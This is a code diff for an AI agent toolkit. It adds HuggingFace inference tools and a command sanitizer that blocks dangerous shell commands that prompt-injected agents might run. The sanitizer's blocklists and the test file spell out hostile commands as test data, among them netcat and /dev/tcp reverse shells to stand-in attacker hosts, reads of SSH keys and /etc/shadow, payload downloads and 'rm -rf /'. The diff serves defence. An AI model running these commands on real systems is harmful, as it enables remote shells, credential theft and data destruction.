tools/src/aden_tools/credentials/huggingface.py
+7 -2
View File
@@ -1,7 +1,7 @@
"""
HuggingFace credentials.
Contains credentials for HuggingFace Hub API access.
Contains credentials for HuggingFace Hub API and Inference API access.
"""
from .base import CredentialSpec
@@ -16,11 +16,16 @@ HUGGINGFACE_CREDENTIALS = {
"huggingface_get_dataset",
"huggingface_search_spaces",
"huggingface_whoami",
"huggingface_run_inference",
"huggingface_run_embedding",
"huggingface_list_inference_endpoints",
],
required=True,
startup_required=False,
help_url="https://huggingface.co/settings/tokens",
description="HuggingFace API token for Hub access (models, datasets, spaces)",
description=(
"HuggingFace API token for Hub access (models, datasets, spaces) and Inference API"
),
direct_api_key_supported=True,
api_key_instructions="""To get a HuggingFace token:
1. Go to https://huggingface.co/settings/tokens
tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
+206
View File
@@ -0,0 +1,206 @@
"""Command sanitization to prevent shell injection attacks.
Validates commands against a blocklist of dangerous patterns before they
are passed to subprocess.run(shell=True). This prevents prompt injection
attacks from tricking AI agents into running destructive or exfiltration
commands on the host system.
Design: uses a blocklist (not allowlist) so agents can run arbitrary
dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
but callers still execute via shell=True, so shell parsing remains a
known limitation of this guardrail.
"""
import re
__all__ = ["CommandBlockedError", "validate_command"]
class CommandBlockedError(Exception):
"""Raised when a command is blocked by the safety filter."""
pass
# ---------------------------------------------------------------------------
# Blocklists
# ---------------------------------------------------------------------------
# Executables / prefixes that are never safe for an AI agent to invoke.
# Matched against each segment of a compound command (split on ; | && ||).
_BLOCKED_EXECUTABLES: list[str] = [
# Network exfiltration
"curl",
"wget",
"nc",
"ncat",
"netcat",
"nmap",
"ssh",
"scp",
"sftp",
"ftp",
"telnet",
"rsync",
# Windows network tools
"invoke-webrequest",
"invoke-restmethod",
"iwr",
"irm",
"certutil",
# User / privilege escalation
"useradd",
"userdel",
"usermod",
"adduser",
"deluser",
"passwd",
"chpasswd",
"visudo",
"net", # net user, net localgroup, etc.
# System destructive
"shutdown",
"reboot",
"halt",
"poweroff",
"init",
"systemctl",
"mkfs",
"fdisk",
"diskpart",
"format", # Windows format
# Reverse shell / code exec wrappers
"bash",
"sh",
"zsh",
"dash",
"csh",
"ksh",
"powershell",
"pwsh",
"cmd",
"cmd.exe",
"wscript",
"cscript",
"mshta",
"regsvr32",
# Credential / secret access
"security", # macOS keychain: security find-generic-password
]
# Patterns matched against the full (joined) command string.
# These catch dangerous flags and argument combos even when the
# executable itself isn't blocked (e.g. python -c '...').
_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
# rm with force/recursive flags targeting root or broad paths
re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
# del /s /q (Windows recursive delete)
re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
# dd writing to disks/partitions
re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
# chmod 777 / chmod -R 777
re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
# sudo — agents should never escalate privileges
re.compile(r"\bsudo\b", re.IGNORECASE),
# su — switch user
re.compile(r"\bsu\s+", re.IGNORECASE),
# python/python3 with -c flag (inline code execution)
re.compile(r"\bpython[23]?\s+-c(?=\s|['\"]|$)", re.IGNORECASE),
# ruby/perl/node with -e flag (inline code execution)
re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
re.compile(r"\bnode\s+-e\b", re.IGNORECASE),
# powershell encoded commands
re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
# Reverse shell patterns
re.compile(r"/dev/tcp/", re.IGNORECASE),
re.compile(r"\bmkfifo\b", re.IGNORECASE),
# eval / exec as standalone commands
re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
# Reading well-known secret files
re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
# Backtick or $() command substitution containing blocked executables
re.compile(r"\$\(.*\b(curl|wget|nc|ncat)\b.*\)", re.IGNORECASE),
re.compile(r"`.*\b(curl|wget|nc|ncat)\b.*`", re.IGNORECASE),
# Environment variable exfiltration via echo/print
re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
# >& /dev/tcp (bash reverse shell)
re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
]
# Shell operators used to split compound commands.
# We check each segment individually against _BLOCKED_EXECUTABLES.
_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
def _normalize_executable_name(token: str) -> str:
"""Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
normalized = token.lower().strip("\"'")
normalized = re.split(r"[\\/]", normalized)[-1]
if normalized.endswith(".exe"):
return normalized[:-4]
return normalized
def _extract_executable(segment: str) -> str:
"""Extract the first token (executable) from a command segment.
Strips environment variable assignments (FOO=bar) from the front.
"""
segment = segment.strip()
# Skip env var assignments at the start: VAR=value cmd ...
tokens = segment.split()
for token in tokens:
if "=" in token and not token.startswith("-"):
continue
# Return lowercase for case-insensitive matching
return _normalize_executable_name(token)
return ""
def validate_command(command: str) -> None:
"""Validate a command string against the safety blocklists.
Args:
command: The shell command string to validate.
Raises:
CommandBlockedError: If the command matches any blocked pattern.
"""
if not command or not command.strip():
return
stripped = command.strip()
# --- Check full-command patterns ---
for pattern in _BLOCKED_PATTERNS:
match = pattern.search(stripped)
if match:
raise CommandBlockedError(
f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
f"If this is a false positive, please modify the command."
)
# --- Check each segment for blocked executables ---
segments = _SHELL_SPLIT_PATTERN.split(stripped)
for segment in segments:
segment = segment.strip()
if not segment:
continue
executable = _extract_executable(segment)
# Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
names_to_check = {executable}
if "." in executable:
names_to_check.add(executable.split(".")[0])
if names_to_check & set(_BLOCKED_EXECUTABLES):
matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
raise CommandBlockedError(
f"Command blocked for safety: '{matched}' is not allowed. "
f"Blocked categories: network tools, privilege escalation, "
f"system destructive commands, shell interpreters."
)
tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
+11
View File
@@ -3,6 +3,7 @@ import subprocess
from mcp.server.fastmcp import FastMCP
from ..command_sanitizer import CommandBlockedError, validate_command
from ..security import WORKSPACES_DIR, get_secure_path
@@ -26,6 +27,10 @@ def register_tools(mcp: FastMCP) -> None:
No network access unless explicitly allowed
No destructive commands (rm -rf, system modification)
Output must be treated as data, not truth
Commands are validated against a safety blocklist before execution
Commands still run through shell=True, so the blocklist only
prevents explicit nested shell executables; it does not remove
shell parsing entirely
Args:
command: The shell command to execute
@@ -37,6 +42,12 @@ def register_tools(mcp: FastMCP) -> None:
Returns:
Dict with command output and execution details, or error dict
"""
# Validate command against safety blocklist before execution
try:
validate_command(command)
except CommandBlockedError as e:
return {"error": f"Command blocked: {e}", "blocked": True}
try:
# Default cwd is the session root
session_root = os.path.join(WORKSPACES_DIR, workspace_id, agent_id, session_id)
tools/src/aden_tools/tools/huggingface_tool/huggingface_tool.py
+237 -3
View File
@@ -1,12 +1,17 @@
"""
HuggingFace Hub Tool - Models, datasets, and spaces discovery via Hub API.
HuggingFace Hub Tool - Models, datasets, spaces discovery and inference via Hub API.
Supports:
- HuggingFace API token (HUGGINGFACE_TOKEN)
- Model, dataset, and space listing/search
- Repository details and user info
- Model inference (text-generation, summarization, classification, etc.)
- Text embeddings via Inference API
- Inference endpoints management
API Reference: https://huggingface.co/docs/hub/api
API Reference:
Hub API: https://huggingface.co/docs/hub/api
Inference API: https://huggingface.co/docs/api-inference
"""
from __future__ import annotations
@@ -21,6 +26,7 @@ if TYPE_CHECKING:
from aden_tools.credentials import CredentialStoreAdapter
BASE_URL = "https://huggingface.co/api"
INFERENCE_URL = "https://api-inference.huggingface.co/models"
def _get_token(credentials: CredentialStoreAdapter | None) -> str | None:
@@ -48,7 +54,7 @@ def _get(
if resp.status_code == 404:
return {"error": f"Not found: {path}"}
if resp.status_code != 200:
return {"error": f"HuggingFace API error {resp.status_code}: {resp.text[:500]}"}
return {"error": (f"HuggingFace API error {resp.status_code}: {resp.text[:500]}")}
return resp.json()
except httpx.TimeoutException:
return {"error": "Request to HuggingFace timed out"}
@@ -56,6 +62,50 @@ def _get(
return {"error": f"HuggingFace request failed: {e!s}"}
def _post(
url: str,
token: str | None,
payload: dict[str, Any],
timeout: float = 120.0,
) -> dict[str, Any] | list:
"""Make a POST request to the HuggingFace Inference API."""
headers: dict[str, str] = {"Content-Type": "application/json"}
if token:
headers["Authorization"] = f"Bearer {token}"
try:
resp = httpx.post(
url,
headers=headers,
json=payload,
timeout=timeout,
)
if resp.status_code == 401:
return {"error": "Unauthorized. Check your HUGGINGFACE_TOKEN."}
if resp.status_code == 404:
return {"error": f"Model not found: {url}"}
if resp.status_code == 503:
body = (
resp.json()
if resp.headers.get("content-type", "").startswith("application/json")
else {}
)
estimated = body.get("estimated_time", "unknown")
return {
"error": "Model is loading",
"estimated_time": estimated,
"help": "The model is being loaded. Retry after the estimated time.",
}
if resp.status_code != 200:
return {
"error": (f"HuggingFace Inference API error {resp.status_code}: {resp.text[:500]}")
}
return resp.json()
except httpx.TimeoutException:
return {"error": "Inference request timed out. Try a smaller input or a faster model."}
except Exception as e:
return {"error": f"HuggingFace inference request failed: {e!s}"}
def _auth_error() -> dict[str, Any]:
return {
"error": "HUGGINGFACE_TOKEN not set",
@@ -322,3 +372,187 @@ def register_tools(
"orgs": orgs,
"type": u.get("type", ""),
}
# -----------------------------------------------------------------
# Inference API Tools
# -----------------------------------------------------------------
@mcp.tool()
def huggingface_run_inference(
model_id: str,
inputs: str,
task: str = "",
parameters: str = "",
) -> dict[str, Any]:
"""
Run inference on a HuggingFace model via the Inference API.
Supports text-generation, summarization, translation, classification,
fill-mask, question-answering, and more. The model's pipeline_tag
determines the task automatically unless overridden.
Args:
model_id: Model ID (e.g. "meta-llama/Llama-3.1-8B-Instruct",
"facebook/bart-large-cnn", "distilbert-base-uncased-finetuned-sst-2-english")
inputs: Input text for the model
task: Optional task override (e.g. "text-generation", "summarization")
parameters: Optional JSON string of model parameters
(e.g. '{"max_new_tokens": 256, "temperature": 0.7}')
Returns:
Dict with model output or error
"""
token = _get_token(credentials)
if not token:
return _auth_error()
if not model_id:
return {"error": "model_id is required"}
if not inputs:
return {"error": "inputs is required"}
payload: dict[str, Any] = {"inputs": inputs}
if parameters:
import json as _json
try:
payload["parameters"] = _json.loads(parameters)
except _json.JSONDecodeError:
return {"error": "parameters must be a valid JSON string"}
url = f"{INFERENCE_URL}/{model_id}"
data = _post(url, token, payload)
if isinstance(data, dict) and "error" in data:
return data
return {
"model_id": model_id,
"task": task or "auto",
"output": data,
}
@mcp.tool()
def huggingface_run_embedding(
model_id: str,
inputs: str,
) -> dict[str, Any]:
"""
Generate text embeddings using a HuggingFace model via the Inference API.
Useful for semantic search, clustering, and similarity comparison.
Args:
model_id: Embedding model ID
(e.g. "sentence-transformers/all-MiniLM-L6-v2",
"BAAI/bge-small-en-v1.5")
inputs: Text to embed (single string)
Returns:
Dict with embedding vector, model_id, and dimensions count
"""
token = _get_token(credentials)
if not token:
return _auth_error()
if not model_id:
return {"error": "model_id is required"}
if not inputs:
return {"error": "inputs is required"}
url = f"{INFERENCE_URL}/{model_id}"
payload: dict[str, Any] = {"inputs": inputs}
data = _post(url, token, payload)
if isinstance(data, dict) and "error" in data:
return data
# Inference API returns the embedding directly as a list of floats
# or a list of lists for batched inputs
embedding = data if isinstance(data, list) else []
dims = len(embedding) if embedding and isinstance(embedding[0], (int, float)) else 0
return {
"model_id": model_id,
"embedding": embedding,
"dimensions": dims,
}
@mcp.tool()
def huggingface_list_inference_endpoints(
namespace: str = "",
) -> dict[str, Any]:
"""
List deployed Inference Endpoints on HuggingFace.
Inference Endpoints are dedicated, production-ready deployments
of HuggingFace models with autoscaling and GPU support.
Args:
namespace: Optional namespace/organization to filter by.
Defaults to the authenticated user.
Returns:
Dict with list of endpoints (name, model, status, url, etc.)
"""
token = _get_token(credentials)
if not token:
return _auth_error()
path = f"/api/endpoints/{namespace}" if namespace else "/api/endpoints"
headers: dict[str, str] = {"Authorization": f"Bearer {token}"}
try:
resp = httpx.get(
f"https://api.endpoints.huggingface.cloud{path}",
headers=headers,
timeout=30.0,
)
if resp.status_code == 401:
return {"error": "Unauthorized. Check your HUGGINGFACE_TOKEN."}
if resp.status_code != 200:
return {
"error": (
f"Failed to list endpoints (HTTP {resp.status_code}): {resp.text[:500]}"
)
}
data = resp.json()
except httpx.TimeoutException:
return {"error": "Request to HuggingFace Endpoints API timed out"}
except Exception as e:
return {"error": f"Endpoints request failed: {e!s}"}
items = data.get("items", data) if isinstance(data, dict) else data
endpoints = []
for ep in items if isinstance(items, list) else []:
endpoints.append(
{
"name": ep.get("name", ""),
"model": (
ep.get("model", {}).get("repository", "")
if isinstance(ep.get("model"), dict)
else ep.get("model", "")
),
"status": (
ep.get("status", {}).get("state", "")
if isinstance(ep.get("status"), dict)
else ep.get("status", "")
),
"url": (
ep.get("status", {}).get("url", "")
if isinstance(ep.get("status"), dict)
else ""
),
"type": ep.get("type", ""),
"provider": (
ep.get("provider", {}).get("vendor", "")
if isinstance(ep.get("provider"), dict)
else ""
),
"region": (
ep.get("provider", {}).get("region", "")
if isinstance(ep.get("provider"), dict)
else ""
),
}
)
return {"endpoints": endpoints, "count": len(endpoints)}
tools/tests/test_command_sanitizer.py
+253
View File
@@ -0,0 +1,253 @@
"""Tests for command_sanitizer — validates that dangerous commands are blocked
while normal development commands pass through unmodified."""
import pytest
from aden_tools.tools.file_system_toolkits.command_sanitizer import (
CommandBlockedError,
validate_command,
)
# ---------------------------------------------------------------------------
# Safe commands that MUST pass validation
# ---------------------------------------------------------------------------
class TestSafeCommands:
"""Common dev commands that should never be blocked."""
@pytest.mark.parametrize(
"cmd",
[
"echo hello",
"echo 'Hello World'",
"uv run pytest tests/ -v",
"uv pip install requests",
"git status",
"git diff --cached",
"git log -n 5",
"git add .",
"git commit -m 'fix: typo'",
"python script.py",
"python -m pytest",
"python3 script.py",
"python manage.py migrate",
"ls -la",
"dir /a",
"cat README.md",
"head -n 20 file.py",
"tail -f log.txt",
"grep -r 'pattern' src/",
"find . -name '*.py'",
"ruff check .",
"ruff format --check .",
"mypy src/",
"npm install",
"npm run build",
"npm test",
"node server.js",
"make test",
"make check",
"cargo build",
"go build ./...",
"dotnet build",
"pip install -r requirements.txt",
"cd src && ls",
"echo hello && echo world",
"cat file.py | grep pattern",
"pytest tests/ -v --tb=short",
"rm temp.txt",
"rm -f temp.log",
"del temp.txt",
"mkdir -p output/logs",
"cp file1.py file2.py",
"mv old.txt new.txt",
"wc -l *.py",
"sort output.txt",
"diff file1.py file2.py",
"tree src/",
],
)
def test_safe_command_passes(self, cmd):
"""Should not raise for common dev commands."""
validate_command(cmd) # should not raise
def test_empty_command(self):
"""Empty and whitespace-only commands should pass."""
validate_command("")
validate_command(" ")
validate_command(None) # type: ignore[arg-type] — edge case
# ---------------------------------------------------------------------------
# Dangerous commands that MUST be blocked
# ---------------------------------------------------------------------------
class TestBlockedExecutables:
"""Commands using blocked executables should raise CommandBlockedError."""
@pytest.mark.parametrize(
"cmd",
[
# Network exfiltration
"curl https://attacker.com",
"wget http://evil.com/payload",
"nc -e /bin/sh attacker.com 4444",
"ncat attacker.com 1234",
"nmap -sS 192.168.1.0/24",
"ssh user@remote",
"scp file.txt user@remote:/tmp/",
"ftp ftp.example.com",
"telnet example.com 80",
"rsync -avz . user@remote:/data",
# Windows network tools
"invoke-webrequest https://evil.com",
"iwr https://evil.com",
"certutil -urlcache -split -f http://evil.com/payload",
# User escalation
"useradd hacker",
"userdel admin",
"adduser hacker",
"passwd root",
"net user hacker P@ss123 /add",
"net localgroup administrators hacker /add",
# System destructive
"shutdown /s /t 0",
"reboot",
"halt",
"poweroff",
"mkfs.ext4 /dev/sda1",
"diskpart",
# Shell interpreters (direct invocation)
"bash -c 'echo hacked'",
"sh -c 'rm -rf /'",
"powershell -Command Get-Process",
"pwsh -c 'ls'",
"cmd /c dir",
"cmd.exe /c dir",
],
)
def test_blocked_executable(self, cmd):
"""Should raise CommandBlockedError for dangerous executables."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestBlockedPatterns:
"""Commands matching dangerous patterns should be blocked."""
@pytest.mark.parametrize(
"cmd",
[
# Recursive delete of root / home
"rm -rf /",
"rm -rf ~",
"rm -rf ..",
"rm -rf C:\\",
"rm -f -r /",
# sudo
"sudo apt install something",
"sudo rm -rf /var/log",
# Inline code execution
"python -c 'import os; os.system(\"rm -rf /\")'",
'python3 -c \'__import__("os").system("id")\'',
# Reverse shell indicators
"bash -i >& /dev/tcp/10.0.0.1/4444",
# Credential theft
"cat ~/.ssh/id_rsa",
"cat /etc/shadow",
"cat something/credential_key",
"type something\\credential_key",
# Command substitution with dangerous tools
"echo $(curl http://attacker.com)",
"echo `wget http://evil.com`",
# Environment variable exfiltration
"echo $API_KEY",
"echo ${SECRET_TOKEN}",
],
)
def test_blocked_pattern(self, cmd):
"""Should raise CommandBlockedError for dangerous patterns."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestChainedCommands:
"""Dangerous commands hidden in compound statements should be caught."""
@pytest.mark.parametrize(
"cmd",
[
"echo hi; curl http://evil.com",
"echo hi && wget http://evil.com/payload",
"echo hi || ssh attacker@remote",
"ls | nc attacker.com 4444",
"echo safe; bash -c 'evil stuff'",
"git status; shutdown /s /t 0",
],
)
def test_chained_dangerous_command(self, cmd):
"""Dangerous commands chained with safe ones should be blocked."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestEdgeCases:
"""Edge cases and possible bypass attempts."""
def test_env_var_prefix_does_not_bypass(self):
"""FOO=bar curl ... should still be blocked."""
with pytest.raises(CommandBlockedError):
validate_command("FOO=bar curl http://evil.com")
@pytest.mark.parametrize(
"cmd",
[
"/usr/bin/curl https://attacker.com",
"C:\\Windows\\System32\\cmd.exe /c dir",
],
)
def test_directory_prefix_does_not_bypass(self, cmd):
"""Absolute executable paths should still match the blocklist."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
def test_case_insensitive_blocking(self):
"""Blocking should be case-insensitive."""
with pytest.raises(CommandBlockedError):
validate_command("CURL http://evil.com")
with pytest.raises(CommandBlockedError):
validate_command("Wget http://evil.com")
def test_exe_suffix_stripped(self):
"""cmd.exe should be blocked same as cmd."""
with pytest.raises(CommandBlockedError):
validate_command("cmd.exe /c dir")
def test_safe_rm_without_dangerous_target(self):
"""rm of a specific file (not root/home) should pass."""
validate_command("rm temp.txt")
validate_command("rm -f output.log")
def test_python_without_c_flag_is_safe(self):
"""python script.py is safe; only python -c is blocked."""
validate_command("python script.py")
validate_command("python -m pytest tests/")
@pytest.mark.parametrize(
"cmd",
[
"python -c'print(1)'",
'python3 -c"print(1)"',
],
)
def test_python_c_with_quoted_inline_code_is_blocked(self, cmd):
"""Quoted inline code after -c should still be blocked."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
def test_error_message_is_descriptive(self):
"""Blocked commands should include a useful error message."""
with pytest.raises(CommandBlockedError, match="blocked for safety"):
validate_command("curl http://evil.com")
tools/tests/tools/test_huggingface_tool.py
+185
View File
@@ -197,3 +197,188 @@ class TestHuggingFaceWhoami:
assert result["name"] == "testuser"
assert len(result["orgs"]) == 1
class TestHuggingFaceRunInference:
def test_missing_token(self, tool_fns):
with patch.dict("os.environ", {}, clear=True):
result = tool_fns["huggingface_run_inference"](
model_id="facebook/bart-large-cnn", inputs="Hello world"
)
assert "error" in result
def test_missing_model_id(self, tool_fns):
with patch.dict("os.environ", ENV):
result = tool_fns["huggingface_run_inference"](model_id="", inputs="Hello")
assert "error" in result
assert "model_id" in result["error"]
def test_missing_inputs(self, tool_fns):
with patch.dict("os.environ", ENV):
result = tool_fns["huggingface_run_inference"](
model_id="facebook/bart-large-cnn", inputs=""
)
assert "error" in result
assert "inputs" in result["error"]
def test_invalid_parameters_json(self, tool_fns):
with patch.dict("os.environ", ENV):
result = tool_fns["huggingface_run_inference"](
model_id="facebook/bart-large-cnn",
inputs="Hello world",
parameters="not valid json",
)
assert "error" in result
assert "JSON" in result["error"]
def test_successful_inference(self, tool_fns):
mock_resp = MagicMock()
mock_resp.status_code = 200
mock_resp.json.return_value = [{"generated_text": "This is a summary of the input text."}]
with (
patch.dict("os.environ", ENV),
patch(
"aden_tools.tools.huggingface_tool.huggingface_tool.httpx.post",
return_value=mock_resp,
),
):
result = tool_fns["huggingface_run_inference"](
model_id="facebook/bart-large-cnn",
inputs="Long article text here...",
)
assert result["model_id"] == "facebook/bart-large-cnn"
assert result["task"] == "auto"
assert isinstance(result["output"], list)
assert result["output"][0]["generated_text"] == "This is a summary of the input text."
def test_inference_with_parameters(self, tool_fns):
mock_resp = MagicMock()
mock_resp.status_code = 200
mock_resp.json.return_value = [{"generated_text": "Generated output"}]
with (
patch.dict("os.environ", ENV),
patch(
"aden_tools.tools.huggingface_tool.huggingface_tool.httpx.post",
return_value=mock_resp,
) as mock_post,
):
result = tool_fns["huggingface_run_inference"](
model_id="meta-llama/Llama-3.1-8B-Instruct",
inputs="Hello",
parameters='{"max_new_tokens": 128, "temperature": 0.7}',
)
assert "output" in result
call_kwargs = mock_post.call_args
assert call_kwargs.kwargs["json"]["parameters"]["max_new_tokens"] == 128
def test_model_loading_503(self, tool_fns):
mock_resp = MagicMock()
mock_resp.status_code = 503
mock_resp.headers = {"content-type": "application/json"}
mock_resp.json.return_value = {"estimated_time": 30.5}
with (
patch.dict("os.environ", ENV),
patch(
"aden_tools.tools.huggingface_tool.huggingface_tool.httpx.post",
return_value=mock_resp,
),
):
result = tool_fns["huggingface_run_inference"](
model_id="bigscience/bloom", inputs="Hello"
)
assert result["error"] == "Model is loading"
assert result["estimated_time"] == 30.5
class TestHuggingFaceRunEmbedding:
def test_missing_token(self, tool_fns):
with patch.dict("os.environ", {}, clear=True):
result = tool_fns["huggingface_run_embedding"](
model_id="sentence-transformers/all-MiniLM-L6-v2", inputs="Hello"
)
assert "error" in result
def test_missing_model_id(self, tool_fns):
with patch.dict("os.environ", ENV):
result = tool_fns["huggingface_run_embedding"](model_id="", inputs="Hello")
assert "error" in result
def test_missing_inputs(self, tool_fns):
with patch.dict("os.environ", ENV):
result = tool_fns["huggingface_run_embedding"](
model_id="sentence-transformers/all-MiniLM-L6-v2", inputs=""
)
assert "error" in result
def test_successful_embedding(self, tool_fns):
mock_embedding = [0.1, 0.2, 0.3, -0.4, 0.5]
mock_resp = MagicMock()
mock_resp.status_code = 200
mock_resp.json.return_value = mock_embedding
with (
patch.dict("os.environ", ENV),
patch(
"aden_tools.tools.huggingface_tool.huggingface_tool.httpx.post",
return_value=mock_resp,
),
):
result = tool_fns["huggingface_run_embedding"](
model_id="sentence-transformers/all-MiniLM-L6-v2",
inputs="Hello world",
)
assert result["model_id"] == "sentence-transformers/all-MiniLM-L6-v2"
assert result["embedding"] == mock_embedding
assert result["dimensions"] == 5
class TestHuggingFaceListInferenceEndpoints:
def test_missing_token(self, tool_fns):
with patch.dict("os.environ", {}, clear=True):
result = tool_fns["huggingface_list_inference_endpoints"]()
assert "error" in result
def test_successful_list(self, tool_fns):
mock_resp = MagicMock()
mock_resp.status_code = 200
mock_resp.json.return_value = [
{
"name": "my-llama-endpoint",
"model": {"repository": "meta-llama/Llama-3.1-8B-Instruct"},
"status": {"state": "running", "url": "https://xyz.endpoints.huggingface.cloud"},
"type": "protected",
"provider": {"vendor": "aws", "region": "us-east-1"},
}
]
with (
patch.dict("os.environ", ENV),
patch(
"aden_tools.tools.huggingface_tool.huggingface_tool.httpx.get",
return_value=mock_resp,
),
):
result = tool_fns["huggingface_list_inference_endpoints"]()
assert result["count"] == 1
assert result["endpoints"][0]["name"] == "my-llama-endpoint"
assert result["endpoints"][0]["model"] == "meta-llama/Llama-3.1-8B-Instruct"
assert result["endpoints"][0]["status"] == "running"
def test_empty_endpoints(self, tool_fns):
mock_resp = MagicMock()
mock_resp.status_code = 200
mock_resp.json.return_value = []
with (
patch.dict("os.environ", ENV),
patch(
"aden_tools.tools.huggingface_tool.huggingface_tool.httpx.get",
return_value=mock_resp,
),
):
result = tool_fns["huggingface_list_inference_endpoints"]()
assert result["count"] == 0
assert result["endpoints"] == []
uv.lock
Generated
+3 -1
View File
@@ -832,10 +832,11 @@ wheels = [
[[package]]
name = "framework"
version = "0.5.1"
version = "0.7.1"
source = { editable = "core" }
dependencies = [
{ name = "anthropic" },
{ name = "croniter" },
{ name = "fastmcp" },
{ name = "httpx" },
{ name = "litellm" },
@@ -871,6 +872,7 @@ requires-dist = [
{ name = "aiohttp", marker = "extra == 'server'", specifier = ">=3.9.0" },
{ name = "aiohttp", marker = "extra == 'webhook'", specifier = ">=3.9.0" },
{ name = "anthropic", specifier = ">=0.40.0" },
{ name = "croniter", specifier = ">=1.4.0" },
{ name = "fastmcp", specifier = ">=2.0.0" },
{ name = "httpx", specifier = ">=0.27.0" },
{ name = "litellm", specifier = ">=1.81.0" },